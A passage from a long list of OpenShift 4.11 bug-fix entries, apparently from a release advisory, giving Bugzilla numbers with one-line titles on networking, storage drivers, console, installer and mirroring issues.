case-sensitive\n2069997 - [4.11] should add user containers in /etc/subuid and /etc/subgid to support run pods in user namespaces\n2070000 - Add warning alerts for installing standalone k8s-nmstate\n2070020 - InContext doesn\u0027t work for Event Sources\n2070047 - Kuryr: Prometheus when installed on the cluster shouldn\u0027t report any alerts in firing state apart from Watchdog and AlertmanagerReceiversNotConfigured\n2070160 - Copy-to-clipboard and \u003cpre\u003e elements cause display issues for ACM dynamic plugins\n2070172 - SRO uses the chart\u0027s name as Helm release, not the SpecialResource\u0027s\n2070181 - [MAPO] serverGroupName ignored\n2070457 - Image vulnerability Popover overflows from the visible area\n2070674 - [GCP] Routes get timed out and nonresponsive after creating 2K service routes\n2070703 - some ipv6 network policy tests consistently failing\n2070720 - [UI] Filter reset doesn\u0027t work on Pods/Secrets/etc pages and complete list disappears\n2070731 - details switch label is not clickable on add page\n2070791 - [GCP]Image registry are crash on cluster with GCP workload identity enabled\n2070792 - service \"openshift-marketplace/marketplace-operator-metrics\" is not annotated with capability\n2070805 - ClusterVersion: could not download the update\n2070854 - cv.status.capabilities.enabledCapabilities doesn?t show the day-2 enabled caps when there are errors on resources update\n2070887 - Cv condition ImplicitlyEnabledCapabilities doesn?t complain about the disabled capabilities which is previously enabled\n2070888 - Cannot bind driver vfio-pci when apply sriovnodenetworkpolicy with type vfio-pci\n2070929 - OVN-Kubernetes: EgressIP breaks access from a pod with EgressIP to other host networked pods on different nodes\n2071019 - rebase vsphere csi driver 2.5\n2071021 - vsphere driver has snapshot support missing\n2071033 - conditionally relabel volumes given annotation not working - SELinux context match is wrong\n2071139 - Ingress pods scheduled on the same node\n2071364 - All image building tests are broken with \" error: build error: attempting to convert BUILD_LOGLEVEL env var value \"\" to integer: strconv.Atoi: parsing \"\": invalid syntax\n2071578 - Monitoring navigation should not be shown if monitoring is not available (CRC)\n2071599 - RoleBidings are not getting updated for ClusterRole in OpenShift Web Console\n2071614 - Updating EgressNetworkPolicy rejecting with error UnsupportedMediaType\n2071617 - remove Kubevirt extensions in favour of dynamic plugin\n2071650 - ovn-k ovn_db_cluster metrics are not exposed for SNO\n2071691 - OCP Console global PatternFly overrides adds padding to breadcrumbs\n2071700 - v1 events show \"Generated from\" message without the source/reporting component\n2071715 - Shows 404 on Environment nav in Developer console\n2071719 - OCP Console global PatternFly overrides link button whitespace\n2071747 - Link to documentation from the overview page goes to a missing link\n2071761 - Translation Keys Are Not Namespaced\n2071799 - Multus CNI should exit cleanly on CNI DEL when the API server is unavailable\n2071859 - ovn-kube pods spec.dnsPolicy should be Default\n2071914 - cloud-network-config-controller 4.10.5: Error building cloud provider client, err: %vfailed to initialize Azure environment: autorest/azure: There is no cloud environment matching the name \"\"\n2071998 - Cluster-version operator should share details of signature verification when it fails in \u0027Force: true\u0027 updates\n2072106 - cluster-ingress-operator tests do not build on go 1.18\n2072134 - Routes are not accessible within cluster from hostnet pods\n2072139 - vsphere driver has permissions to create/update PV objects\n2072154 - Secondary Scheduler operator panics\n2072171 - Test \"[sig-network][Feature:EgressFirewall] EgressFirewall should have no impact outside its namespace [Suite:openshift/conformance/parallel]\" fails\n2072195 - machine api doesn\u0027t issue client cert when AWS DNS suffix missing\n2072215 - Whereabouts ip-reconciler should be opt-in and not required\n2072389 - CVO exits upgrade immediately rather than waiting for etcd backup\n2072439 - openshift-cloud-network-config-controller reports wrong range of IP addresses for Azure worker nodes\n2072455 - make bundle overwrites supported-nic-ids_v1_configmap.yaml\n2072570 - The namespace titles for operator-install-single-namespace test keep changing\n2072710 - Perfscale - pods time out waiting for OVS port binding (ovn-installed)\n2072766 - Cluster Network Operator stuck in CrashLoopBackOff when scheduled to same master\n2072780 - OVN kube-master does not clear NetworkUnavailableCondition on GCP BYOH Windows node\n2072793 - Drop \"Used Filesystem\" from \"Virtualization -\u003e Overview\"\n2072805 - Observe \u003e Dashboards: $__range variables cause PromQL query errors\n2072807 - Observe \u003e Dashboards: Missing `panel.styles` attribute for table panels causes JS error\n2072842 - (release-4.11) Gather namespace names with overlapping UID ranges\n2072883 - sometimes monitoring dashboards charts can not be loaded successfully\n2072891 - Update gcp-pd-csi-driver to 1.5.1;\n2072911 - panic observed in kubedescheduler operator\n2072924 - periodic-ci-openshift-release-master-ci-4.11-e2e-azure-techpreview-serial\n2072957 - ContainerCreateError loop leads to several thousand empty logfiles in the file system\n2072998 - update aws-efs-csi-driver to the latest version\n2072999 - Navigate from logs of selected Tekton task instead of last one\n2073021 - [vsphere] Failed to update OS on master nodes\n2073112 - Prometheus (uwm) externalLabels not showing always in alerts. \n2073113 - Warning is logged to the console: W0407 Defaulting of registry auth file to \"${HOME}/.docker/config.json\" is deprecated. \n2073176 - removing data in form does not remove data from yaml editor\n2073197 - Error in Spoke/SNO agent: Source image rejected: A signature was required, but no signature exists\n2073329 - Pipelines-plugin- Having different title for Pipeline Runs tab, on Pipeline Details page it\u0027s \"PipelineRuns\" and on Repository Details page it\u0027s \"Pipeline Runs\". \n2073373 - Update azure-disk-csi-driver to 1.16.0\n2073378 - failed egressIP assignment - cloud-network-config-controller does not delete failed cloudprivateipconfig\n2073398 - machine-api-provider-openstack does not clean up OSP ports after failed server provisioning\n2073436 - Update azure-file-csi-driver to v1.14.0\n2073437 - Topology performance: Firehose/useK8sWatchResources cache can return unexpected data format if isList differs on multiple calls\n2073452 - [sig-network] pods should successfully create sandboxes by other - failed (add)\n2073473 - [OVN SCALE][ovn-northd] Unnecessary SB record no-op changes added to SB transaction. \n2073522 - Update ibm-vpc-block-csi-driver to v4.2.0\n2073525 - Update vpc-node-label-updater to v4.1.2\n2073901 - Installation failed due to etcd operator Err:DefragControllerDegraded: failed to dial endpoint https://10.0.0.7:2379 with maintenance client: context canceled\n2073937 - Invalid retention time and invalid retention size should be validated at one place and have error log in one place for UMW\n2073938 - APIRemovedInNextEUSReleaseInUse alert for runtimeclasses\n2073945 - APIRemovedInNextEUSReleaseInUse alert for podsecuritypolicies\n2073972 - Invalid retention time and invalid retention size should be validated at one place and have error log in one place for platform monitoring\n2074009 - [OVN] ovn-northd doesn\u0027t clean Chassis_Private record after scale down to 0 a machineSet\n2074031 - Admins should be able to tune garbage collector aggressiveness (GOGC) for kube-apiserver if necessary\n2074062 - Node Tuning Operator(NTO) - Cloud provider profile rollback doesn\u0027t work well\n2074084 - CMO metrics not visible in the OCP webconsole UI\n2074100 - CRD filtering according to name broken\n2074210 - asia-south2, australia-southeast2, and southamerica-west1Missing from GCP regions\n2074237 - oc new-app --image-stream flag behavior is unclear\n2074243 - DefaultPlacement API allow empty enum value and remove default\n2074447 - cluster-dashboard: CPU Utilisation iowait and steal\n2074465 - PipelineRun fails in import from Git flow if \"main\" branch is default\n2074471 - Cannot delete namespace with a LB type svc and Kuryr when ExternalCloudProvider is enabled\n2074475 - [e2e][automation] kubevirt plugin cypress tests fail\n2074483 - coreos-installer doesnt work on Dell machines\n2074544 - e2e-metal-ipi-ovn-ipv6 failing due to recent CEO changes\n2074585 - MCG standalone deployment page goes blank when the KMS option is enabled\n2074606 - occm does not have permissions to annotate SVC objects\n2074612 - Operator fails to install due to service name lookup failure\n2074613 - nodeip-configuration container incorrectly attempts to relabel /etc/systemd/system\n2074635 - Unable to start Web Terminal after deleting existing instance\n2074659 - AWS installconfig ValidateForProvisioning always provides blank values to validate zone records\n2074706 - Custom EC2 endpoint is not considered by AWS EBS CSI driver\n2074710 - Transition to go-ovirt-client\n2074756 - Namespace column provide wrong data in ClusterRole Details -\u003e Rolebindings tab\n2074767 - Metrics page show incorrect values due to metrics level config\n2074807 - NodeFilesystemSpaceFillingUp alert fires even before kubelet GC kicks in\n2074902 - `oc debug node/nodename ? chroot /host somecommand` should exit with non-zero when the sub-command failed\n2075015 - etcd-guard connection refused event repeating pathologically (payload blocking)\n2075024 - Metal upgrades permafailing on metal3 containers crash looping\n2075050 - oc-mirror fails to calculate between two channels with different prefixes for the same version of OCP\n2075091 - Symptom Detection.Undiagnosed panic detected in pod\n2075117 - Developer catalog: Order dropdown (A-Z, Z-A) is miss-aligned (in a separate row)\n2075149 - Trigger Translations When Extensions Are Updated\n2075189 - Imports from dynamic-plugin-sdk lead to failed module resolution errors\n2075459 - Set up cluster on aws with rootvolumn io2 failed due to no iops despite it being configured\n2075475 - OVN-Kubernetes: egress router pod (redirect mode), access from pod on different worker-node (redirect) doesn\u0027t work\n2075478 - Bump documentationBaseURL to 4.11\n2075491 - nmstate operator cannot be upgraded on SNO\n2075575 - Local Dev Env - Prometheus 404 Call errors spam the console\n2075584 - improve clarity of build failure messages when using csi shared resources but tech preview is not enabled\n2075592 - Regression - Top of the web terminal drawer is missing a stroke/dropshadow\n2075621 - Cluster upgrade.[sig-mco] Machine config pools complete upgrade\n2075647 - \u0027oc adm upgrade ...\u0027 POSTs ClusterVersion, clobbering any unrecognized spec properties\n2075671 - Cluster Ingress Operator K8S API cache contains duplicate objects\n2075778 - Fix failing TestGetRegistrySamples test\n2075873 - Bump recommended FCOS to 35.20220327.3.0\n2076193 - oc patch command for the liveness probe and readiness probe parameters of an OpenShift router deployment doesn\u0027t take effect\n2076270 - [OCPonRHV] MachineSet scale down operation fails to delete the worker VMs\n2076277 - [RFE] [OCPonRHV] Add storage domain ID valueto Compute/ControlPlain section in the machine object\n2076290 - PTP operator readme missing documentation on BC setup via PTP config\n2076297 - Router process ignores shutdown signal while starting up\n2076323 - OLM blocks all operator installs if an openshift-marketplace catalogsource is unavailable\n2076355 - The KubeletConfigController wrongly process multiple confs for a pool after having kubeletconfig in bootstrap\n2076393 - [VSphere] survey fails to list datacenters\n2076521 - Nodes in the same zone are not updated in the right order\n2076527 - Pipeline Builder: Make unnecessary tekton hub API calls when the user types \u0027too fast\u0027\n2076544 - Whitespace (padding) is missing after an PatternFly update, already in 4.10\n2076553 - Project access view replace group ref with user ref when updating their Role\n2076614 - Missing Events component from the SDK API\n2076637 - Configure metrics for vsphere driver to be reported\n2076646 - openshift-install destroy unable to delete PVC disks in GCP if cluster identifier is longer than 22 characters\n2076793 - CVO exits upgrade immediately rather than waiting for etcd backup\n2076831 - [ocp4.11]Mem/cpu high utilization by apiserver/etcd for cluster stayed 10 hours\n2076877 - network operator tracker to switch to use flowcontrol.apiserver.k8s.io/v1beta2 instead v1beta1 to be deprecated in k8s 1.26\n2076880 - OKD: add cluster domain to the uploaded vm configs so that 30-local-dns-prepender can use it\n2076975 - Metric unset during static route conversion in configure-ovs.sh\n2076984 - TestConfigurableRouteNoConsumingUserNoRBAC fails in CI\n2077050 - OCP should default to pd-ssd disk type on GCP\n2077150 - Breadcrumbs on a few screens don\u0027t have correct top margin spacing\n2077160 - Update owners for openshift/cluster-etcd-operator\n2077357 - [release-4.11] 200ms packet delay with OVN controller turn on\n2077373 - Accessibility warning on developer perspective\n2077386 - Import page shows untranslated values for the route advanced routing\u003esecurity options (devconsole~Edge)\n2077457 - failure in test case \"[sig-network][Feature:Router] The HAProxy router should serve the correct routes when running with the haproxy config manager\"\n2077497 - Rebase etcd to 3.5.3 or later\n2077597 - machine-api-controller is not taking the proxy configuration when it needs to reach the RHV API\n2077599 - OCP should alert users if they are on vsphere version \u003c7.0.2\n2077662 - AWS Platform Provisioning Check incorrectly identifies record as part of domain of cluster\n2077797 - LSO pods don\u0027t have any resource requests\n2077851 - \"make vendor\" target is not working\n2077943 - If there is a service with multiple ports, and the route uses 8080, when editing the 8080 port isn\u0027t replaced, but a random port gets replaced and 8080 still stays\n2077994 - Publish RHEL CoreOS AMIs in AWS ap-southeast-3 region\n2078013 - drop multipathd.socket workaround\n2078375 - When using the wizard with template using data source the resulting vm use pvc source\n2078396 - [OVN AWS] EgressIP was not balanced to another egress node after original node was removed egress label\n2078431 - [OCPonRHV] - ERROR failed to instantiate provider \"openshift/local/ovirt\" to obtain schema: ERROR fork/exec\n2078526 - Multicast breaks after master node reboot/sync\n2078573 - SDN CNI -Fail to create nncp when vxlan is up\n2078634 - CRI-O not killing Calico CNI stalled (zombie) processes. \n2078698 - search box may not completely remove content\n2078769 - Different not translated filter group names (incl. Secret, Pipeline, PIpelineRun)\n2078778 - [4.11] oc get ValidatingWebhookConfiguration,MutatingWebhookConfiguration fails and caused ?apiserver panic\u0027d...http2: panic serving xxx.xx.xxx.21:49748: cannot deep copy int? when AllRequestBodies audit-profile is used. \n2078781 - PreflightValidation does not handle multiarch images\n2078866 - [BM][IPI] Installation with bonds fail - DaemonSet \"openshift-ovn-kubernetes/ovnkube-node\" rollout is not making progress\n2078875 - OpenShift Installer fail to remove Neutron ports\n2078895 - [OCPonRHV]-\"cow\" unsupported value in format field in install-config.yaml\n2078910 - CNO spitting out \".spec.groups[0].rules[4].runbook_url: field not declared in schema\"\n2078945 - Ensure only one apiserver-watcher process is active on a node. \n2078954 - network-metrics-daemon makes costly global pod list calls scaling per node\n2078969 - Avoid update races between old and new NTO operands during cluster upgrades\n2079012 - egressIP not migrated to correct workers after deleting machineset it was assigned\n2079062 - Test for console demo plugin toast notification needs to be increased for ci testing\n2079197 - [RFE] alert when more than one default storage class is detected\n2079216 - Partial cluster update reference doc link returns 404\n2079292 - containers prometheus-operator/kube-rbac-proxy violate PodSecurity\n2079315 - (release-4.11) Gather ODF config data with Insights\n2079422 - Deprecated 1.25 API call\n2079439 - OVN Pods Assigned Same IP Simultaneously\n2079468 - Enhance the waitForIngressControllerCondition for better CI results\n2079500 - okd-baremetal-install uses fcos for bootstrap but rhcos for cluster\n2079610 - Opeatorhub status shows errors\n2079663 - change default image features in RBD storageclass\n2079673 - Add flags to disable migrated code\n2079685 - Storageclass creation page with \"Enable encryption\" is not displaying saved KMS connection details when vaulttenantsa details are available in csi-kms-details config\n2079724 - cluster-etcd-operator - disable defrag-controller as there is unpredictable impact on large OpenShift Container Platform 4 - Cluster\n2079788 - Operator restarts while applying the acm-ice example\n2079789 - cluster drops ImplicitlyEnabledCapabilities during upgrade\n2079803 - Upgrade-triggered etcd backup will be skip during serial upgrade\n2079805 - Secondary scheduler operator should comply to restricted pod security level\n2079818 - Developer catalog installation overlay (modal?) shows a duplicated padding\n2079837 - [RFE] Hub/Spoke example with daemonset\n2079844 - EFS cluster csi driver status stuck in AWSEFSDriverCredentialsRequestControllerProgressing with sts installation\n2079845 - The Event Sinks catalog page now has a blank space on the left\n2079869 - Builds for multiple kernel versions should be ran in parallel when possible\n2079913 - [4.10] APIRemovedInNextEUSReleaseInUse alert for OVN endpointslices\n2079961 - The search results accordion has no spacing between it and the side navigation bar. \n2079965 - [rebase v1.24] [sig-node] PodOSRejection [NodeConformance] Kubelet should reject pod when the node OS doesn\u0027t match pod\u0027s OS [Suite:openshift/conformance/parallel] [Suite:k8s]\n2080054 - TAGS arg for installer-artifacts images is not propagated to build images\n2080153 - aws-load-balancer-operator-controller-manager pod stuck in ContainerCreating status\n2080197 - etcd leader changes produce test churn during early stage of test\n2080255 - EgressIP broken on AWS with OpenShiftSDN / latest nightly build\n2080267 - [Fresh Installation] Openshift-machine-config-operator namespace is flooded with events related to clusterrole, clusterrolebinding\n2080279 - CVE-2022-29810 go-getter: writes SSH credentials into logfile, exposing sensitive credentials to local uses\n2080379 - Group all e2e tests as parallel or serial\n2080387 - Visual connector not appear between the node if a node get created using \"move connector\" to a different application\n2080416 - oc bash-completion problem\n2080429 - CVO must ensure non-upgrade related changes are saved when desired payload fails to load\n2080446 - Sync ironic images with latest bug fixes packages\n2080679 - [rebase v1.24] [sig-cli] test failure\n2080681 - [rebase v1.24] [sig-cluster-lifecycle] CSRs from machines that are not recognized by the cloud provider are not approved [Suite:openshift/conformance/parallel]\n2080687 - [rebase v1.24] [sig-network][Feature:Router] tests are failing\n2080873 - Topology graph crashes after update to 4.11 when Layout 2 (ColaForce) was selected previously\n2080964 - Cluster operator special-resource-operator is always in Failing state with reason: \"Reconciling simple-kmod\"\n2080976 - Avoid hooks config maps when hooks are empty\n2081012 - [rebase v1.24] [sig-devex][Feature:OpenShiftControllerManager] TestAutomaticCreationOfPullSecrets [Suite:openshift/conformance/parallel]\n2081018 - [rebase v1.24] [sig-imageregistry][Feature:Image] oc tag should work when only imagestreams api is available\n2081021 - [rebase v1.24] [sig-api-machinery] API data in etcd should be stored at the correct location and version for all resources\n2081062 - Unrevert RHCOS back to 8.6\n2081067 - admin dev-console /settings/cluster should point out history may be excerpted\n2081069 - [sig-network] pods should successfully create sandboxes by adding pod to network\n2081081 - PreflightValidation \"odd number of arguments passed as key-value pairs for logging\" error\n2081084 - [rebase v1.24] [sig-instrumentation] Events API should ensure that an event can be fetched, patched, deleted, and listed\n2081087 - [rebase v1.24] [sig-auth] ServiceAccounts should allow opting out of API token automount\n2081119 - `oc explain` output of default overlaySize is outdated\n2081172 - MetallLB: YAML view in webconsole does not show all the available key value pairs of all the objects\n2081201 - cloud-init User check for Windows VM refuses to accept capitalized usernames\n2081447 - Ingress operator performs spurious updates in response to API\u0027s defaulting of router deployment\u0027s router container\u0027s ports\u0027 protocol field\n2081562 - lifecycle.posStart hook does not have network connectivity. \n2081685 - Typo in NNCE Conditions\n2081743 - [e2e] tests failing\n2081788 - MetalLB: the crds are not validated until metallb is deployed\n2081821 - SpecialResourceModule CRD is not installed after deploying SRO operator using brew bundle image via OLM\n2081895 - Use the managed resource (and not the manifest) for resource health checks\n2081997 - disconnected insights operator remains degraded after editing pull secret\n2082075 - Removing huge amount of ports takes a lot of time. \n2082235 - CNO exposes a generic apiserver that apparently does nothing\n2082283 - Transition to new oVirt Terraform provider\n2082360 - OCP 4.10.4, CNI: SDN; Whereabouts IPAM: Duplicate IP address with bond-cni\n2082380 - [4.10.z] customize wizard is crashed\n2082403 - [LSO] No new build local-storage-operator-metadata-container created\n2082428 - oc patch healthCheckInterval with invalid \"5 s\" to the ingress-controller successfully\n2082441 - [UPI] aws-load-balancer-operator-controller-manager failed to get VPC ID in UPI on AWS\n2082492 - [IPI IBM]Can\u0027t create image-registry-private-configuration secret with error \"specified resource key credentials does not contain HMAC keys\"\n2082535 - [OCPonRHV]-workers are cloned when \"clone: false\" is specified in install-config.yaml\n2082538 - apirequests limits of Cluster CAPI Operator are too low for GCP platform\n2082566 - OCP dashboard fails to load when the query to Prometheus takes more than 30s to return\n2082604 - [IBMCloud][x86_64] IBM VPC does not properly support RHCOS Custom Image tagging\n2082667 - No new machines provisioned while machineset controller drained old nodes for change to machineset\n2082687 - [IBM Cloud][x86_64][CCCMO] IBM x86_64 CCM using unsupported --port argument\n2082763 - Cluster install stuck on the applying for operatorhub \"cluster\"\n2083149 - \"Update blocked\" label incorrectly displays on new minor versions in the \"Other available paths\" modal\n2083153 - Unable to use application credentials for Manila PVC creation on OpenStack\n2083154 - Dynamic plugin sdk tsdoc generation does not render docs for parameters\n2083219 - DPU network operator doesn\u0027t deal with c1... inteface names\n2083237 - [vsphere-ipi] Machineset scale up process delay\n2083299 - SRO does not fetch mirrored DTK images in disconnected clusters\n2083445 - [FJ OCP4.11 Bug]: RAID setting during IPI cluster deployment fails if iRMC port number is specified\n2083451 - Update external serivces URLs to console.redhat.com\n2083459 - Make numvfs \u003e totalvfs error message more verbose\n2083466 - Failed to create clusters on AWS C2S/SC2S due to image-registry MissingEndpoint error\n2083514 - Operator ignores managementState Removed\n2083641 - OpenShift Console Knative Eventing ContainerSource generates wrong api version when pointed to k8s Service\n2083756 - Linkify not upgradeable message on ClusterSettings page\n2083770 - Release image signature manifest filename extension is yaml\n2083919 - openshift4/ose-operator-registry:4.10.0 having security vulnerabilities\n2083942 - Learner promotion can temporarily fail with rpc not supported for learner errors\n2083964 - Sink resources dropdown is not persisted in form yaml switcher in event source creation form\n2083999 - \"--prune-over-size-limit\" is not working as expected\n2084079 - prometheus route is not updated to \"path: /api\" after upgrade from 4.10 to 4.11\n2084081 - nmstate-operator installed cluster on POWER shows issues while adding new dhcp interface\n2084124 - The Update cluster modal includes a broken link\n2084215 - Resource configmap \"openshift-machine-api/kube-rbac-proxy\" is defined by 2 manifests\n2084249 - panic in ovn pod from an e2e-aws-single-node-serial nightly run\n2084280 - GCP API Checks Fail if non-required APIs are not enabled\n2084288 - \"alert/Watchdog must have no gaps or changes\" failing after bump\n2084292 - Access to dashboard resources is needed in dynamic plugin SDK\n2084331 - Resource with multiple capabilities included unless all capabilities are disabled\n2084433 - Podsecurity violation error getting logged for ingresscontroller during deployment. \n2084438 - Change Ping source spec.jsonData (deprecated) field to spec.data\n2084441 - [IPI-Azure]fail to check the vm capabilities in install cluster\n2084459 - Topology list view crashes when switching from chart view after moving sink from knative service to uri\n2084463 - 5 control plane replica tests fail on ephemeral volumes\n2084539 - update azure arm templates to support customer provided vnet\n2084545 - [rebase v1.24] cluster-api-operator causes all techpreview tests to fail\n2084580 - [4.10] No cluster name sanity validation - cluster name with a dot (\".\") character\n2084615 - Add to navigation option on search page is not properly aligned\n2084635 - PipelineRun creation from the GUI for a Pipeline with 2 workspaces hardcode the PVC storageclass\n2084732 - A special resource that was created in OCP 4.9 can\u0027t be deleted after an upgrade to 4.10\n2085187 - installer-artifacts fails to build with go 1.18\n2085326 - kube-state-metrics is tripping APIRemovedInNextEUSReleaseInUse\n2085336 - [IPI-Azure] Fail to create the worker node which HyperVGenerations is V2 or V1 and vmNetworkingType is Accelerated\n2085380 - [IPI-Azure] Incorrect error prompt validate VM image and instance HyperV gen match when install cluster\n2085407 - There is no Edit link/icon for labels on Node details page\n2085721 - customization controller image name is wrong\n2086056 - Missing doc for OVS HW offload\n2086086 - Update Cluster Sample Operator dependencies and libraries for OCP 4.11\n2086092 - update kube to v.24\n2086143 - CNO uses too much memory\n2086198 - Cluster CAPI Operator creates unnecessary defaulting webhooks\n2086301 - kubernetes nmstate pods are not running after creating instance\n2086408 - Podsecurity violation error getting logged for externalDNS operand pods during deployment\n2086417 - Pipeline created from add flow has GIT Revision as required field\n2086437 - EgressQoS CRD not available\n2086450 - aws-load-balancer-controller-cluster pod logged Podsecurity violation error during deployment\n2086459 - oc adm inspect fails when one of resources not exist\n2086461 - CNO probes MTU unnecessarily in Hypershift, making cluster startup take too long\n2086465 - External identity providers should log login attempts in the audit trail\n2086469 - No data about title \u0027API Request Duration by Verb - 99th Percentile\u0027 display on the dashboard \u0027API Performance\u0027\n2086483 - baremetal-runtimecfg k8s dependencies should be on a par with 1.24 rebase\n2086505 - Update oauth-server images to be consistent with ART\n2086519 - workloads must comply to restricted security policy\n2086521 - Icons of Knative actions are not clearly visible on the context menu in the dark mode\n2086542 - Cannot create service binding through drag and drop\n2086544 - ovn-k master daemonset on hypershift shouldn\u0027t log token\n2086546 - Service binding connector is not visible in the dark mode\n2086718 - PowerVS destroy code does not work\n2086728 - [hypershift] Move drain to controller\n2086731 - Vertical pod autoscaler operator needs a 4.11 bump\n2086734 - Update csi driver images to be consistent with ART\n2086737 - cloud-provider-openstack rebase to kubernetes v1.24\n2086754 - Cluster resource override operator needs a 4.11 bump\n2086759 - [IPI] OCP-4.11 baremetal - boot partition is not mounted on temporary directory\n2086791 - Azure: Validate UltraSSD instances in multi-zone regions\n2086851 - pods with multiple external gateways may only be have ECMP routes for one gateway\n2086936 - vsphere ipi should use cores by default instead of sockets\n2086958 - flaky e2e in kube-controller-manager-operator TestPodDisruptionBudgetAtLimitAlert\n2086959 - flaky e2e in kube-controller-manager-operator TestLogLevel\n2086962 - oc-mirror publishes metadata with --dry-run when publishing to mirror\n2086964 - oc-mirror fails on differential run when mirroring a package with multiple channels specified\n2086972 - oc-mirror does not error invalid metadata is passed to the describe command\n2086974 - oc-mirror does not work with headsonly for operator 4.8\n2087024 - The oc-mirror result mapping.txt is not correct , can?t be used by `oc image mirror` command\n2087026 - DTK\u0027s imagestream is missing from OCP 4.11 payload\n2087037 - Cluster Autoscaler should use K8s 1.24 dependencies\n2087039 - Machine API components should use K8s 1.24 dependencies\n2087042 - Cloud providers components should use K8s 1.24 dependencies\n2087084 - remove unintentional nic support\n2087103 - \"Updating to release image\" from \u0027oc\u0027 should point out that the cluster-version operator hasn\u0027t accepted the update\n2087114 - Add simple-procfs-kmod in modprobe example in README.md\n2087213 - Spoke BMH stuck \"inspecting\" when deployed via ZTP in 4.11 OCP hub\n2087271 - oc-mirror does not check for existing workspace when performing mirror2mirror synchronization\n2087556 - Failed to render DPU ovnk manifests\n2087579 - ` --keep-manifest-list=true` does not work for `oc adm release new` , only pick up the linux/amd64 manifest from the manifest list\n2087680 - [Descheduler] Sync with sigs.k8s.io/descheduler\n2087684 - KCMO should not be able to apply LowUpdateSlowReaction from Default WorkerLatencyProfile\n2087685 - KASO should not be able to apply LowUpdateSlowReaction from Default WorkerLatencyProfile\n2087687 - MCO does not generate event when user applies Default -\u003e LowUpdateSlowReaction WorkerLatencyProfile\n2087764 - Rewrite the registry backend will hit error\n2087771 - [tracker] NetworkManager 1.36.0 loses DHCP lease and doesn\u0027t try again\n2087772 - Bindable badge causes some layout issues with the side panel of bindable operator backed services\n2087942 - CNO references images that are divergent from ART\n2087944 - KafkaSink Node visualized incorrectly\n2087983 - remove etcd_perf before restore\n2087993 - PreflightValidation many \"msg\":\"TODO: preflight checks\" in the operator log\n2088130 - oc-mirror init does not allow for automated testing\n2088161 - Match dockerfile image name with the name used in the release repo\n2088248 - Create HANA VM does not use values from customized HANA templates\n2088304 - ose-console: enable source containers for open source requirements\n2088428 - clusteroperator/baremetal stays in progressing: Applying metal3 resources state on a fresh install\n2088431 - AvoidBuggyIPs field of addresspool should be removed\n2088483 - oc adm catalog mirror returns 0 even if there are errors\n2088489 - Topology list does not allow selecting an application group anymore (again)\n2088533 - CRDs for openshift.io should have subresource.status failes on sharedconfigmaps.sharedresource and sharedsecrets.sharedresource\n2088535 - MetalLB: Enable debug log level for downstream CI\n2088541 - Default CatalogSources in openshift-marketplace namespace keeps throwing pod security admission warnings `would violate PodSecurity \"restricted:v1.24\"`\n2088561 - BMH unable to start inspection: File name too long\n2088634 - oc-mirror does not fail when catalog is invalid\n2088660 - Nutanix IPI installation inside container failed\n2088663 - Better to change the default value of --max-per-registry to 6\n2089163 - NMState CRD out of sync with code\n2089191 - should remove grafana from cluster-monitoring-config configmap in hypershift cluster\n2089224 - openshift-monitoring/cluster-monitoring-config configmap always revert to default setting\n2089254 - CAPI operator: Rotate token secret if its older than 30 minutes\n2089276 - origin tests for egressIP and azure fail\n2089295 - [Nutanix]machine stuck in Deleting phase when delete a machineset whose replicas\u003e=2 and machine is Provisioning phase on Nutanix\n2089309 - [OCP 4.11] Ironic inspector image fails to clean disks that are part of a multipath setup if they are passive paths\n2089334 - All cloud providers should use service account credentials\n2089344 - Failed to deploy simple-kmod\n2089350 - Rebase sdn to 1.24\n2089387 - LSO not taking mpath. ignoring device\n2089392 - 120 node baremetal upgrade from 4.9.29 --\u003e 4.10.13 crashloops on machine-approver\n2089396 - oc-mirror does not show pruned image plan\n2089405 - New topology package shows gray build icons instead of green/red icons for builds and pipelines\n2089419 - do not block 4.10 to 4.11 upgrades if an existing CSI driver is found. Instead, warn about presence of third party CSI driver\n2089488 - Special resources are missing the managementState field\n2089563 - Update Power VS MAPI to use api\u0027s from openshift/api repo\n2089574 - UWM prometheus-operator pod can\u0027t start up due to no master node in hypershift cluster\n2089675 - Could not move Serverless Service without Revision (or while starting?)\n2089681 - [Hypershift] EgressIP doesn\u0027t work in hypershift guest cluster\n2089682 - Installer expects all nutanix subnets to have a cluster reference which is not the case for e.g. overlay networks\n2089687 - alert message of MCDDrainError needs to be updated for new drain controller\n2089696 - CR reconciliation is stuck in daemonset lifecycle\n2089716 - [4.11][reliability]one worker node became NotReady on which ovnkube-node pod\u0027s memory increased sharply\n2089719 - acm-simple-kmod fails to build\n2089720 - [Hypershift] ICSP doesn\u0027t work for the guest cluster\n2089743 - acm-ice fails to deploy: helm chart does not appear to be a gzipped archive\n2089773 - Pipeline status filter and status colors doesn\u0027t work correctly with non-english languages\n2089775 - keepalived can keep ingress VIP on wrong node under certain circumstances\n2089805 - Config duration metrics aren\u0027t exposed\n2089827 - MetalLB CI - backward compatible tests are failing due to the order of delete\n2089909 - PTP e2e testing not working on SNO cluster\n2089918 - oc-mirror skip-missing still returns 404 errors when images do not exist\n2089930 - Bump OVN to 22.06\n2089933 - Pods do not post readiness status on termination\n2089968 - Multus CNI daemonset should use hostPath mounts with type: directory\n2089973 - bump libs to k8s 1.24 for OCP 4.11\n2089996 - Unnecessary yarn install runs in e2e tests\n2090017 - Enable source containers to meet open source requirements\n2090049 - destroying GCP cluster which has a compute node without infra id in name would fail to delete 2 k8s firewall-rules and VPC network\n2090092 - Will hit error if specify the channel not the latest\n2090151 - [RHEL scale up] increase the wait time so that the node has enough time to get ready\n2090178 - VM SSH command generated by UI points at api VIP\n2090182 - [Nutanix]Create a machineset with invalid image, machine stuck in \"Provisioning\" phase\n2090236 - Only reconcile annotations and status for clusters\n2090266 - oc adm release extract is failing on mutli arch image\n2090268 - [AWS EFS] Operator not getting installed successfully on Hypershift Guest cluster\n2090336 - Multus logging should be disabled prior to release\n2090343 - Multus debug logging should be enabled temporarily for debugging podsandbox creation failures. \n2090358 - Initiating drain log message is displayed before the drain actually starts\n2090359 - Nutanix mapi-controller: misleading error message when the failure is caused by wrong credentials\n2090405 - [tracker] weird port mapping with asymmetric traffic [rhel-8.6.0.z]\n2090430 - gofmt code\n2090436 - It takes 30min-60min to update the machine count in custom MachineConfigPools (MCPs) when a node is removed from the pool\n2090437 - Bump CNO to k8s 1.24\n2090465 - golang version mismatch\n2090487 - Change default SNO Networking Type and disallow OpenShiftSDN a supported networking Type\n2090537 - failure in ovndb migration when db is not ready in HA mode\n2090549 - dpu-network-operator shall be able to run on amd64 arch platform\n2090621 - Metal3 plugin does not work properly with updated NodeMaintenance CRD\n2090627 - Git commit and branch are empty in MetalLB log\n2090692 - Bump to latest 1.24 k8s 